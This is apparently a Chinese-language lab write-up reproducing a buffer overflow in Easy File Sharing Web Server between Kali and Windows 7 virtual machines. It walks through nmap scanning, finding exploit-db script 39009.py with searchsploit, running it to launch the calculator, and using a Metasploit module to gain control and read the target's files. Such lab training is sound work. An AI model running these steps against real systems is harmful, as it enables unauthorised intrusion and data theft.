一,
做一下这个漏洞复现
1.在kali 和Windows这两台虚拟机上做
并且是以NAT模式连接在同一网络
2.先在Windows7虚拟机中安装easy file sharing server
安装之后会出现以下界面,选择try it
可知http服务用的端口为80,服务器ip=192.168.110.130
接下来使用kali
用nmap工具扫描上面的IP 192.168.110.130
nmap -sV 192.168.110.130
查看各开放端口使用的服务名称和版本号
80端口和443端口
80端口开放
利用漏洞
在kali中访问存在漏洞的服务端口
192.168.110.130 :80
试试正常长度,结果如下
当超出5000字符时,结果无响应
回到win7时,easy file sharing server已经崩溃自动关闭
可见漏洞存在
此处我们的目的是,利用漏洞运行靶机的计算器。对于实现该功能的渗透模块,可以基于Kali Linux系统自带的漏洞库中相关的渗透模块来编写。回到kali中,使用下面的命令查找相关渗透模块:searchsploit easy file sharing
Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH) | windows/remote/39009.py
查阅资料,可知该脚本可以实现再目标计算机执行计算器程序的功能
python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.110.130 80
运行成功,回到win7中查看,关闭之前崩溃的程序,计算器自动打开,复现完成
二、Metasploit应用
在终端输入msfconsole
启动msf之后,找到EasyFileSharing的漏洞利用模块
输入
search EasyFileSharing
选择2015年的利用模块,输入use exploit/windows/http/easyfilesharing_seh
目标靶机还没设置,会报错,再输入show options进行配置
配置目标靶机地址:set RHOSTS+目标靶机ip地址
然后进行模块攻击,输入exploit
这时候就可以用ls查看被控制端的文件了,还可以输入cat+文件名可查看内容